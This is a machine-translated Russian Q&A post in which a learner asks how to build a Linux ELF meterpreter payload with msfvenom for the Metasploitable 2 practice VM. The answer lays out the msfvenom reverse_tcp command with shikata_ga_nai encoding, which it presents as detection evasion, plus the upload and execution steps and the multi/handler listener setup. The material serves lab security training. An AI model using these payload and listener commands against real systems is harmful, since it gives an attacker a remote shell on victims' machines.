Вопрос или проблема
Как использовать подход msfvenom elf для Metasploitable 2?
Я читаю книгу, которая учит, как создать исполняемый файл msfvenom для Windows. Но я учусь на Metasploitable 2. Я действительно не хотел пропускать этот раздел, не понимая его. Поэтому я взял еще 2 книги, но обе они также учат только подходу для Windows, искал в интернете, и похоже, что я нашел только способы для Windows exe. Так что я решил сделать это сам. Я сделал следующее.
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -e x86/shikata_ga_nai -f elf -o test.elf
Затем я получил оболочку и сделал
Upload test.elf test.elf
Затем я запустил bash test.elf
на машине, и ничего не произошло.
Я запустил file test.elf
, и вот что я получил:
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
Что я делаю не так?
После нескольких попыток немного подправить нагрузку. Безуспешно. Я переустановил Metasploitable 2.
Я снова сделал нагрузку так, как изначально планировалось.
Я запустил sudo ./test.elf
на машине Metasploitable, и это сработало.
Я уже запускал sudo ./test.elf
ранее, и он выдал мне ошибку “команда не найдена” на другой установке.
Теперь, пох看来, это работает. После создания нескольких нагрузок они все работают сейчас. Я предполагаю, что это была плохая установка, или я как-то испортил другую версию Metasploitable 2.
Ответ или решение
Использование Metasploit с Msfvenom для Metasploitable 2
Чтобы успешно использовать подход msfvenom elf
на платформе Metasploitable 2, важно учитывать несколько ключевых аспектов. Ниже приведены пошаговые инструкции и рекомендации, которые помогут вам создать и запустить исполняемый ELF файл, используя msfvenom.
Шаг 1: Создание полезной нагрузки с Msfvenom
-
Запуск команды msfvenom:
Для создания полезной нагрузки используйте следующую команду:msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -e x86/shikata_ga_nai -f elf -o test.elf
Здесь:
-a x86
указывает архитектуру.--platform linux
определяет целевую платформу.-p linux/x86/meterpreter/reverse_tcp
указывает тип полезной нагрузки.LHOST
иLPORT
необходимо заменить на ваш внешний IP-адрес и порт, которые будут использоваться для обратного соединения.-e x86/shikata_ga_nai
указывает на использование обфускации полезной нагрузки, что помогает избежать обнаружения.-f elf
указывает на формат выходного файла.-o test.elf
задает имя выходного файла.
-
Проверка на ошибки:
После генерации полезной нагрузки убедитесь, что файл не поврежден. Используйте:file test.elf
Это должно вернуть информацию о файле, подтверждая, что он распознается как исполняемый ELF файл.
Шаг 2: Загружайте файл на Metasploitable 2
- Скопируйте файл:
Загрузите сгенерированный файлtest.elf
на машину Metasploitable 2. Это можно сделать с помощью SCP или любого другого метода передачи файлов.
Например:scp test.elf user@metasploitable:/path/to/destination/
Шаг 3: Запуск исполняемого файла
-
Дайте права на выполнение:
Перед запуском убедитесь, что файл имеет права на выполнение:chmod +x test.elf
-
Запуск файла:
Запустите файл с помощью следующей команды:sudo ./test.elf
Запуск с
sudo
может быть необходим, так как некоторые действия требуют повышенных привилегий.
Шаг 4: Настройка слушателя Metasploit
-
Запуск Metasploit Framework:
Откройте терминал и запустите:msfconsole
-
Настройка слушателя:
Установите необходимые настройки для обратного соединения, например:use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST xxx.xxx.xxx.xxx set LPORT xxxx exploit
Возможные проблемы и их решения
-
Ошибка файла: Если в выводе команды
file test.elf
вы видите сообщение о поврежденном заголовке секции, это может указывать на неправильную генерацию файла. Убедитесь, что команды выполнялись правильно и без ошибок. -
Команда не найдена: Если получаете сообщение "command not found" при запуске, это может быть связано с неправильным путём к файлу или отсутствием прав на выполнение. Проверьте путь и примените права, как указано выше.
Заключение
Использование msfvenom с metasploitable 2 — это мощный метод изучения безопасности и эксплуатации уязвимостей. Следуя вышеизложенным шагам, вы сможете успешно создать и запустить полезную нагрузку ELF. Убедитесь, что ваша лаборатория безопасна и предназначена только для учебных целей.